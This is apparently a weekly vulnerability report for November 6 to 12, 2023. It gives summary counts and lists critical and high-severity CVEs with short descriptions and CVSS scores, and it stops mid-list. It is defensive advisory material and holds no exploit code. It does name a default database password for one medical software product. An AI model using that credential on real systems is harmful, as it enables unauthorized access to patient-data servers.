Weekly Vulnerabilities Reports > November 6 to 12, 2023

Overview

559 new vulnerabilities reported during this period, including 86 critical vulnerabilities and 226 high severity vulnerabilities. This weekly summary report vulnerabilities in 1277 products from 313 vendors including Samsung, Lenovo, Qualcomm, Huawei, and Fedoraproject. Vulnerabilities are notably categorized as "Cross-Site Request Forgery (CSRF)", "Cross-site Scripting", "Out-of-bounds Write", "SQL Injection", and "Improper Neutralization of Formula Elements in a CSV File".

  • 445 reported vulnerabilities are remotely exploitables.
  • 168 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 333 reported vulnerabilities are exploitable by an anonymous user.
  • Samsung has the most reported vulnerabilities, with 33 reported vulnerabilities.
  • Zavio has the most reported critical vulnerabilities, with 5 reported vulnerabilities.

TOTAL
VULNERABILITIES
CRITICAL RISK
VULNERABILITIES
HIGH RISK
VULNERABILITIES
MEDIUM RISK
VULNERABILITIES
LOW RISK
VULNERABILITIES
REMOTELY
EXPLOITABLE
LOCALLY
EXPLOITABLE
EXPLOIT
AVAILABLE
EXPLOITABLE
ANONYMOUSLY
AFFECTING
WEB APPLICATION

Vulnerability Details

The following table list reported vulnerabilities for the period covered by this report:

Expand/Hide

86 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-12 CVE-2023-6084 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere 2017

A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical.

9.8
2023-11-11 CVE-2023-46850 Openvpn
Debian
Fedoraproject
Use After Free vulnerability in multiple products

Use after free in OpenVPN version 2.6.0 to 2.6.6 may lead to undefined behavoir, leaking memory buffers or remote execution when sending network buffers to a remote peer.

9.8
2023-11-10 CVE-2023-4804 Johnsoncontrols Unspecified vulnerability in Johnsoncontrols products

An unauthorized user could access debug features in Quantum HD Unity products that were accidentally exposed.

9.8
2023-11-10 CVE-2023-47129 Statamic Unrestricted Upload of File with Dangerous Type vulnerability in Statamic

Statmic is a core Laravel content management system Composer package.

9.8
2023-11-10 CVE-2023-47121 Discourse Server-Side Request Forgery (SSRF) vulnerability in Discourse

Discourse is an open source platform for community discussion.

9.8
2023-11-10 CVE-2023-6074 Phpgurukul SQL Injection vulnerability in PHPgurukul Restaurant Table Booking System 1.0

A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0.

9.8
2023-11-10 CVE-2023-47800 Natus Use of Hard-coded Credentials vulnerability in Natus Neuroworks EEG and Sleepworks

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

9.8
2023-11-10 CVE-2023-39796 Wbce SQL Injection vulnerability in Wbce CMS 1.6.0

SQL injection vulnerability in the miniform module in WBCE CMS v.1.6.0 allows remote unauthenticated attacker to execute arbitrary code via the DB_RECORD_TABLE parameter.

9.8
2023-11-10 CVE-2023-47246 Sysaid Path Traversal vulnerability in Sysaid On-Premises

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

9.8
2023-11-09 CVE-2023-5550 Moodle
Fedoraproject
In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user who also has direct access to the web server outside of the Moodle webroot could utilise a local file include to achieve remote code execution.
9.8
2023-11-09 CVE-2023-6053 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere

A vulnerability, which was classified as critical, has been found in Tongda OA 2017 up to 11.9.

9.8
2023-11-09 CVE-2023-6054 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere

A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9.

9.8
2023-11-09 CVE-2023-47610 Telit Classic Buffer Overflow vulnerability in Telit products

A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message.

9.8
2023-11-09 CVE-2023-41137 Appsanywhere Use of Hard-coded Credentials vulnerability in Appsanywhere Client

Symmetric encryption used to protect messages between the AppsAnywhere server and client can be broken by reverse engineering the client and used to impersonate the AppsAnywhere server.

9.8
2023-11-09 CVE-2023-4612 Apereo Improper Authentication vulnerability in Apereo Central Authentication Service

Improper Authentication vulnerability in Apereo CAS in jakarta.servlet.http.HttpServletRequest.getRemoteAddr method allows Multi-Factor Authentication bypass.This issue affects CAS: through 7.0.0-RC7.

9.8
2023-11-09 CVE-2023-6052 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere

A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.9.

9.8
2023-11-09 CVE-2023-47248 Apache Deserialization of Untrusted Data vulnerability in Apache Pyarrow

Deserialization of untrusted data in IPC and Parquet readers in PyArrow versions 0.14.0 to 14.0.0 allows arbitrary code execution.

9.8
2023-11-08 CVE-2023-39435 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to stack-based overflows.

9.8
2023-11-08 CVE-2023-3959 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows.

9.8
2023-11-08 CVE-2023-43755 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows.

9.8
2023-11-08 CVE-2023-45225 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras  with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows.

9.8
2023-11-08 CVE-2023-4249 Zavio OS Command Injection vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 has a command injection vulnerability in their implementation of their binaries and handling of network requests.

9.8
2023-11-08 CVE-2023-29974 Pfsense Weak Password Requirements vulnerability in Pfsense 2.6.0

An issue discovered in Pfsense CE version 2.6.0 allows attackers to compromise user accounts via weak password requirements.

9.8
2023-11-08 CVE-2023-5913 Microfocus Unspecified vulnerability in Microfocus Fortify Scancentral Dast

Incorrect Privilege Assignment vulnerability in opentext Fortify ScanCentral DAST.

9.8
2023-11-08 CVE-2023-45849 Perforce Code Injection vulnerability in Perforce Helix Core

An arbitrary code execution which results in privilege escalation was discovered in Helix Core versions prior to 2023.2.

9.8
2023-11-08 CVE-2023-47397 Webidsupport Code Injection vulnerability in Webidsupport Webid

WeBid <=1.2.2 is vulnerable to code injection via admin/categoriestrans.php.

9.8
2023-11-08 CVE-2023-6012 Lanaccess Unspecified vulnerability in Lanaccess Onsafe Monitorhm 3.7.0

An improper input validation vulnerability has been found in Lanaccess ONSAFE MonitorHM affecting version 3.7.0.

9.8
2023-11-08 CVE-2023-5941 Freebsd Incorrect Calculation of Buffer Size vulnerability in Freebsd

In versions of FreeBSD 12.4-RELEASE prior to 12.4-RELEASE-p7 and FreeBSD 13.2-RELEASE prior to 13.2-RELEASE-p5 the __sflush() stdio function in libc does not correctly update FILE objects' write space members for write-buffered streams when the write(2) system call returns an error.

9.8
2023-11-07 CVE-2023-46785 Projectworlds Unspecified vulnerability in Projectworlds Online Matrimonial Project 1.0

Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities.

9.8
2023-11-07 CVE-2023-5309 Puppet Session Fixation vulnerability in Puppet Enterprise

Versions of Puppet Enterprise prior to 2021.7.6 and 2023.5 contain a flaw which results in broken session management for SAML implementations.

9.8
2023-11-07 CVE-2022-45360 Coffee2Code Improper Neutralization of Formula Elements in a CSV File vulnerability in Coffee2Code Commenter Emails

Improper Neutralization of Formula Elements in a CSV File vulnerability in Scott Reilly Commenter Emails.This issue affects Commenter Emails: from n/a through 2.6.1.

9.8
2023-11-07 CVE-2022-45370 Webtoffee Improper Neutralization of Formula Elements in a CSV File vulnerability in Webtoffee Wordpress Comments Import and Export

Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee WordPress Comments Import & Export.This issue affects WordPress Comments Import & Export: from n/a through 2.3.1.

9.8
2023-11-07 CVE-2022-45810 Icegram Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Express

Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce.This issue affects Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce: from n/a through 5.5.2.

9.8
2023-11-07 CVE-2022-46801 Geminilabs Improper Neutralization of Formula Elements in a CSV File vulnerability in Geminilabs Site Reviews

Improper Neutralization of Formula Elements in a CSV File vulnerability in Paul Ryley Site Reviews.This issue affects Site Reviews: from n/a through 6.2.0.

9.8
2023-11-07 CVE-2022-46803 Noptin Improper Neutralization of Formula Elements in a CSV File vulnerability in Noptin

Improper Neutralization of Formula Elements in a CSV File vulnerability in Noptin Newsletter Simple Newsletter Plugin – Noptin.This issue affects Simple Newsletter Plugin – Noptin: from n/a through 1.9.5.

9.8
2023-11-07 CVE-2022-46809 Wpdeveloper Improper Neutralization of Formula Elements in a CSV File vulnerability in Wpdeveloper Reviewx

Improper Neutralization of Formula Elements in a CSV File vulnerability in WPDeveloper ReviewX – Multi-criteria Rating & Reviews for WooCommerce.This issue affects ReviewX – Multi-criteria Rating & Reviews for WooCommerce: from n/a through 1.6.7.

9.8
2023-11-07 CVE-2022-45357 Lenderd Unspecified vulnerability in Lenderd 1003 Mortgage Application

Improper Neutralization of Formula Elements in a CSV File vulnerability in Lenderd 1003 Mortgage Application.This issue affects 1003 Mortgage Application: from n/a through 1.75.

9.8
2023-11-07 CVE-2022-46802 Webtoffee Unspecified vulnerability in Webtoffee Product Reviews Import Export for Woocommerce

Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee Product Reviews Import Export for WooCommerce.This issue affects Product Reviews Import Export for WooCommerce: from n/a through 1.4.8.

9.8
2023-11-07 CVE-2023-22719 Givewp Improper Neutralization of Formula Elements in a CSV File vulnerability in Givewp

Improper Neutralization of Formula Elements in a CSV File vulnerability in GiveWP.This issue affects GiveWP: from n/a through 2.25.1.

9.8
2023-11-07 CVE-2023-23796 WEB Settler Improper Neutralization of Formula Elements in a CSV File vulnerability in Web-Settler Form Builder

Improper Neutralization of Formula Elements in a CSV File vulnerability in Muneeb Form Builder | Create Responsive Contact Forms.This issue affects Form Builder | Create Responsive Contact Forms: from n/a through 1.9.9.0.

9.8
2023-11-07 CVE-2023-47359 Videolan Out-of-bounds Write vulnerability in Videolan VLC Media Player

Videolan VLC prior to version 3.0.20 contains an incorrect offset read that leads to a Heap-Based Buffer Overflow in function GetPacket() and results in a memory corruption.

9.8
2023-11-07 CVE-2023-33478 Remoteclinic SQL Injection vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic 2.0 has a SQL injection vulnerability in the ID parameter of /medicines/stocks.php.

9.8
2023-11-07 CVE-2023-33479 Remoteclinic SQL Injection vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic version 2.0 contains a SQL injection vulnerability in the /staff/edit.php file.

9.8
2023-11-07 CVE-2023-33481 Remoteclinic SQL Injection vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic 2.0 is vulnerable to a time-based blind SQL injection attack in the 'start' GET parameter of patients/index.php.

9.8
2023-11-07 CVE-2023-42283 TYK SQL Injection vulnerability in TYK 5.0.3

Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

9.8
2023-11-07 CVE-2023-42284 TYK SQL Injection vulnerability in TYK 5.0.3

Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

9.8
2023-11-07 CVE-2023-38547 Veeam Unspecified vulnerability in Veeam ONE

A vulnerability in Veeam ONE allows an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database.

9.8
2023-11-07 CVE-2023-22388 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory Corruption in Multi-mode Call Processor while processing bit mask API.

9.8
2023-11-07 CVE-2023-33045 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in WLAN Firmware while parsing a NAN management frame carrying a S3 attribute.

9.8
2023-11-07 CVE-2023-2675 Linagora Unspecified vulnerability in Linagora Twake

Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 2023.Q1.1223.

9.8
2023-11-06 CVE-2023-5601 Atomicwebstrategy Unrestricted Upload of File with Dangerous Type vulnerability in Atomicwebstrategy Woocommerce Ninja Forms Product Add-Ons

The WooCommerce Ninja Forms Product Add-ons WordPress plugin before 1.7.1 does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.

9.8
2023-11-06 CVE-2023-5719 Redlion Unspecified vulnerability in Redlion Crimson

The Crimson 3.2 Windows-based configuration tool allows users with administrative access to define new passwords for users and to download the resulting security configuration to a device.

9.8
2023-11-06 CVE-2023-5777 Weintek Use of Hard-coded Credentials vulnerability in Weintek Easybuilder PRO

Weintek EasyBuilder Pro contains a vulnerability that, even when the private key is immediately deleted after the crash report transmission is finished, the private key is exposed to the public, which could result in obtaining remote control of the crash report server.

9.8
2023-11-06 CVE-2023-46731 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

9.8
2023-11-06 CVE-2023-45827 Clickbar Unspecified vulnerability in Clickbar Dot-Diver

Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation.

9.8
2023-11-06 CVE-2023-27605 WP Reroute Email Project SQL Injection vulnerability in WP Reroute Email Project WP Reroute Email

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sajjad Hossain WP Reroute Email allows SQL Injection.This issue affects WP Reroute Email: from n/a through 1.4.6.

9.8
2023-11-06 CVE-2023-28748 Appjetty SQL Injection vulnerability in Appjetty Copy or Move Comments

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in biztechc Copy or Move Comments allows SQL Injection.This issue affects Copy or Move Comments: from n/a through 5.0.4.

9.8
2023-11-06 CVE-2023-33924 Felixwelberg SQL Injection vulnerability in Felixwelberg SIS Handball

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Felix Welberg SIS Handball allows SQL Injection.This issue affects SIS Handball: from n/a through 1.0.45.

9.8
2023-11-06 CVE-2023-35911 Creative Solutions SQL Injection vulnerability in Creative-Solutions Contact Form Generator

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Creative Solutions Contact Form Generator : Creative form builder for WordPress allows SQL Injection.This issue affects Contact Form Generator : Creative form builder for WordPress: from n/a through 2.6.0.

9.8
2023-11-06 CVE-2023-38382 Subscribe TO Category Project SQL Injection vulnerability in Subscribe to Category Project Subscribe to Category

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category allows SQL Injection.This issue affects Subscribe to Category: from n/a through 2.7.4.

9.8
2023-11-06 CVE-2023-40207 Rednao SQL Injection vulnerability in Rednao Donations Made Easy - Smart Donations

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RedNao Donations Made Easy – Smart Donations allows SQL Injection.This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.

9.8
2023-11-06 CVE-2023-40609 Rocklobster SQL Injection vulnerability in Rocklobster Contact Form 7 Custom Validation 1.1.3

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aiyaz, maheshpatel Contact form 7 Custom validation allows SQL Injection.This issue affects Contact form 7 Custom validation: from n/a through 1.1.3.

9.8
2023-11-06 CVE-2023-41685 Ilghera SQL Injection vulnerability in Ilghera Woocommerce Support System

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ilGhera Woocommerce Support System allows SQL Injection.This issue affects Woocommerce Support System: from n/a through 1.2.1.

9.8
2023-11-06 CVE-2023-45001 Castos SQL Injection vulnerability in Castos Seriously Simple Stats 1.1/1.2.0

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Castos Seriously Simple Stats allows SQL Injection.This issue affects Seriously Simple Stats: from n/a through 1.5.0.

9.8
2023-11-06 CVE-2023-45046 Pressference SQL Injection vulnerability in Pressference Exporter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pressference Pressference Exporter allows SQL Injection.This issue affects Pressference Exporter: from n/a through 1.0.3.

9.8
2023-11-06 CVE-2023-45055 Inspireui SQL Injection vulnerability in Inspireui Mstore API

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InspireUI MStore API allows SQL Injection.This issue affects MStore API: from n/a through 4.0.6.

9.8
2023-11-06 CVE-2023-45069 Total Soft SQL Injection vulnerability in Total-Soft Video Gallery

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Video Gallery by Total-Soft Video Gallery – Best WordPress YouTube Gallery Plugin allows SQL Injection.This issue affects Video Gallery – Best WordPress YouTube Gallery Plugin: from n/a through 2.1.3.

9.8
2023-11-06 CVE-2023-45074 Pagevisitcounter SQL Injection vulnerability in Pagevisitcounter Advanced Page Visit Counter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress allows SQL Injection.This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 7.1.1.

9.8
2023-11-06 CVE-2023-45657 Posimyth SQL Injection vulnerability in Posimyth Nexter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection.This issue affects Nexter: from n/a through 2.0.3.

9.8
2023-11-06 CVE-2023-45830 Adaplugin SQL Injection vulnerability in Adaplugin Accessibility Suite BY Online ADA

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection.This issue affects Accessibility Suite by Online ADA: from n/a through 4.11.

9.8
2023-11-06 CVE-2022-45373 WP Slimstat SQL Injection vulnerability in Wp-Slimstat Slimstat Analytics

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jason Crouse, VeronaLabs Slimstat Analytics allows SQL Injection.This issue affects Slimstat Analytics: from n/a through 5.0.4.

9.8
2023-11-06 CVE-2022-46849 Weblizar SQL Injection vulnerability in Weblizar Responsive Coming Soon & Maintenance Mode

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar Coming Soon Page – Responsive Coming Soon & Maintenance Mode allows SQL Injection.This issue affects Coming Soon Page – Responsive Coming Soon & Maintenance Mode: from n/a through 1.5.9.

9.8
2023-11-06 CVE-2022-46860 Kaizencoders SQL Injection vulnerability in Kaizencoders Short URL

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in KaizenCoders Short URL allows SQL Injection.This issue affects Short URL: from n/a through 1.6.4.

9.8
2023-11-06 CVE-2022-47420 Adaplugin SQL Injection vulnerability in Adaplugin Accessibility Suite BY Online ADA

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection.This issue affects Accessibility Suite by Online ADA: from n/a through 4.11.

9.8
2023-11-06 CVE-2022-47428 Wpdevart SQL Injection vulnerability in Wpdevart Booking Calendar

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WpDevArt Booking calendar, Appointment Booking System allows SQL Injection.This issue affects Booking calendar, Appointment Booking System: from n/a through 3.2.7.

9.8
2023-11-06 CVE-2022-47430 Weblizar SQL Injection vulnerability in Weblizar School Management - Education & Learning Management

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar The School Management – Education & Learning Management allows SQL Injection.This issue affects The School Management – Education & Learning Management: from n/a through 4.1.

9.8
2023-11-06 CVE-2022-47432 Kemalyazici SQL Injection vulnerability in Kemalyazici Shortcode Imdb

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Kemal YAZICI - PluginPress Shortcode IMDB allows SQL Injection.This issue affects Shortcode IMDB: from n/a through 6.0.8.

9.8
2023-11-06 CVE-2023-38406 Frrouting Improper Handling of Exceptional Conditions vulnerability in Frrouting

bgpd/bgp_flowspec.c in FRRouting (FRR) before 8.4.3 mishandles an nlri length of zero, aka a "flowspec overflow."

9.8
2023-11-06 CVE-2023-47253 Qualitor Command Injection vulnerability in Qualitor Qalitor

Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.

9.8
2023-11-06 CVE-2018-25093 Vaerys Dawn Unspecified vulnerability in Vaerys-Dawn Discordsailv2

A vulnerability was found in Vaerys-Dawn DiscordSailv2 up to 2.10.2.

9.8
2023-11-10 CVE-2023-47128 Piccolo ORM SQL Injection vulnerability in Piccolo-Orm Piccolo 1.1.0

Piccolo is an object-relational mapping and query builder which supports asyncio.

9.1
2023-11-08 CVE-2023-5801 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui and Harmonyos

Vulnerability of identity verification being bypassed in the face unlock module.

9.1
2023-11-07 CVE-2023-46501 Boltwire Unspecified vulnerability in Boltwire 6.03

An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.

9.1
2023-11-07 CVE-2023-47455 Tenda Out-of-bounds Write vulnerability in Tenda Ax1806 Firmware 1.0.0.1

Tenda AX1806 V1.0.0.1 contains a heap overflow vulnerability in setSchedWifi function, in which the src and v12 are directly obtained from http request parameter schedStartTime and schedEndTime without checking their size.

9.1
2023-11-07 CVE-2023-47456 Tenda Out-of-bounds Write vulnerability in Tenda Ax1806 Firmware 1.0.0.1

Tenda AX1806 V1.0.0.1 contains a stack overflow vulnerability in function sub_455D4, called by function fromSetWirelessRepeat.

9.1
2023-11-06 CVE-2023-4699 Mitsubishielectric Insufficient Verification of Data Authenticity vulnerability in Mitsubishielectric products

Insufficient Verification of Data Authenticity vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules and MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to reset the memory of the products to factory default state and cause denial-of-service (DoS) condition on the products by sending specific packets.

9.1

226 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-12 CVE-2023-27417 Ifeelweb Cross-Site Request Forgery (CSRF) vulnerability in Ifeelweb Affiliate Super Assistent

Cross-Site Request Forgery (CSRF) vulnerability in Timo Reith Affiliate Super Assistent plugin <= 1.5.1 versions.

8.8
2023-11-12 CVE-2023-27418 WOW Company Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Side Menu Lite

Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Side Menu Lite – add sticky fixed buttons plugin <= 4.0 versions.

8.8
2023-11-12 CVE-2023-27431 Themehunk Cross-Site Request Forgery (CSRF) vulnerability in Themehunk BIG Store

Cross-Site Request Forgery (CSRF) vulnerability in ThemeHunk Big Store theme <= 1.9.3 versions.

8.8
2023-11-12 CVE-2023-27611 Jeanbaptisteaudras Cross-Site Request Forgery (CSRF) vulnerability in Jeanbaptisteaudras Reusable Blocks Extended

Cross-Site Request Forgery (CSRF) vulnerability in audrasjb Reusable Blocks Extended plugin <= 0.9 versions.

8.8
2023-11-12 CVE-2023-27623 Jenst Cross-Site Request Forgery (CSRF) vulnerability in Jenst WP Page Numbers

Cross-Site Request Forgery (CSRF) vulnerability in Jens Törnell WP Page Numbers plugin <= 0.5 versions.

8.8
2023-11-12 CVE-2023-27632 Daily Prayer Time Project Cross-Site Request Forgery (CSRF) vulnerability in Daily Prayer Time Project Daily Prayer Time

Cross-Site Request Forgery (CSRF) vulnerability in mmrs151 Daily Prayer Time plugin <= 2023.03.08 versions.

8.8
2023-11-12 CVE-2023-28167 Vsourz Cross-Site Request Forgery (CSRF) vulnerability in Vsourz CF7 Invisible Recaptcha

Cross-Site Request Forgery (CSRF) vulnerability in Vsourz Digital CF7 Invisible reCAPTCHA plugin <= 1.3.3 versions.

8.8
2023-11-12 CVE-2023-28172 Flippercode Cross-Site Request Forgery (CSRF) vulnerability in Flippercode WP Google MAP

Cross-Site Request Forgery (CSRF) vulnerability in flippercode WordPress Plugin for Google Maps – WP MAPS (formerly WP Google Map Plugin) plugin <= 4.4.2 versions.

8.8
2023-11-12 CVE-2023-28173 Digitalinspiration Cross-Site Request Forgery (CSRF) vulnerability in Digitalinspiration Google XML Sitemap for Images

Cross-Site Request Forgery (CSRF) vulnerability in Amit Agarwal Google XML Sitemap for Images plugin <= 2.1.3 versions.

8.8
2023-11-12 CVE-2023-28419 Strangerstudios Cross-Site Request Forgery (CSRF) vulnerability in Strangerstudios Force Display Name

Cross-Site Request Forgery (CSRF) vulnerability in Stranger Studios Force First and Last Name as Display Name plugin <= 1.2 versions.

8.8
2023-11-12 CVE-2023-28420 Leocaseiro Cross-Site Request Forgery (CSRF) vulnerability in Leocaseiro Custom Options Plus

Cross-Site Request Forgery (CSRF) vulnerability in Leo Caseiro Custom Options Plus plugin <= 1.8.1 versions.

8.8
2023-11-12 CVE-2023-28495 Mythemeshop Cross-Site Request Forgery (CSRF) vulnerability in Mythemeshop WP Shortcode

Cross-Site Request Forgery (CSRF) vulnerability in MyThemeShop WP Shortcode by MyThemeShop plugin <= 1.4.16 versions.

8.8
2023-11-12 CVE-2023-28497 Tribulant Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Slideshow Gallery

Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Slideshow Gallery LITE plugin <= 1.7.6 versions.

8.8
2023-11-12 CVE-2023-28498 Motopress Cross-Site Request Forgery (CSRF) vulnerability in Motopress Hotel Booking Lite

Cross-Site Request Forgery (CSRF) vulnerability in MotoPress Hotel Booking Lite plugin <= 4.6.0 versions.

8.8
2023-11-12 CVE-2023-28618 Infolific Cross-Site Request Forgery (CSRF) vulnerability in Infolific Enhanced Plugin Admin

Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Enhanced Plugin Admin plugin <= 1.16 versions.

8.8
2023-11-12 CVE-2023-28694 Wbcomdesigns Cross-Site Request Forgery (CSRF) vulnerability in Wbcomdesigns Buddypress Activity Social Share

Cross-Site Request Forgery (CSRF) vulnerability in Wbcom Designs Wbcom Designs – BuddyPress Activity Social Share plugin <= 3.5.0 versions.

8.8
2023-11-12 CVE-2023-28696 Themeist Cross-Site Request Forgery (CSRF) vulnerability in Themeist I Recommend This

Cross-Site Request Forgery (CSRF) vulnerability in Harish Chouhan, Themeist I Recommend Tplugin <= 3.9.0 versions.

8.8
2023-11-12 CVE-2023-28930 Robinphillips Cross-Site Request Forgery (CSRF) vulnerability in Robinphillips Mobile Banner

Cross-Site Request Forgery (CSRF) vulnerability in Robin Phillips Mobile Banner plugin <= 1.5 versions.

8.8
2023-11-12 CVE-2023-28987 Wpmet Cross-Site Request Forgery (CSRF) vulnerability in Wpmet WP Ultimate Review

Cross-Site Request Forgery (CSRF) vulnerability in Wpmet Wp Ultimate Review plugin <= 2.0.3 versions.

8.8
2023-11-12 CVE-2023-29238 Whydonate Cross-Site Request Forgery (CSRF) vulnerability in Whydonate WP Whydonate

Cross-Site Request Forgery (CSRF) vulnerability in Whydonate Whydonate – FREE Donate button – Crowdfunding – Fundraising plugin <= 3.12.15 versions.

8.8
2023-11-12 CVE-2023-29425 Plainware Cross-Site Request Forgery (CSRF) vulnerability in Plainware Shiftcontroller

Cross-Site Request Forgery (CSRF) vulnerability in plainware.Com ShiftController Employee Shift Scheduling plugin <= 4.9.23 versions.

8.8
2023-11-10 CVE-2023-39295 Qnap OS Command Injection vulnerability in Qnap Qumagie

An OS command injection vulnerability has been reported to affect QuMagie.

8.8
2023-11-10 CVE-2023-41284 Qnap SQL Injection vulnerability in Qnap Qumagie

A SQL injection vulnerability has been reported to affect QuMagie.

8.8
2023-11-10 CVE-2023-41285 Qnap SQL Injection vulnerability in Qnap Qumagie

A SQL injection vulnerability has been reported to affect QuMagie.

8.8
2023-11-10 CVE-2023-29426 Spreadshop Cross-Site Request Forgery (CSRF) vulnerability in Spreadshop 1.6.5

Cross-Site Request Forgery (CSRF) vulnerability in Robert Schulz (sprd.Net AG) Spreadshop plugin <= 1.6.5 versions.

8.8
2023-11-10 CVE-2023-29428 Superbthemes Cross-Site Request Forgery (CSRF) vulnerability in Superbthemes Superb Social Media Share Buttons and Follow Buttons

Cross-Site Request Forgery (CSRF) vulnerability in SuPlugins Superb Social Media Share Buttons and Follow Buttons for WordPress plugin <= 1.1.3 versions.

8.8
2023-11-10 CVE-2023-29440 Presstigers Cross-Site Request Forgery (CSRF) vulnerability in Presstigers Simple JOB Board

Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board plugin <= 2.10.3 versions.

8.8
2023-11-10 CVE-2023-30478 Tribulant Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters

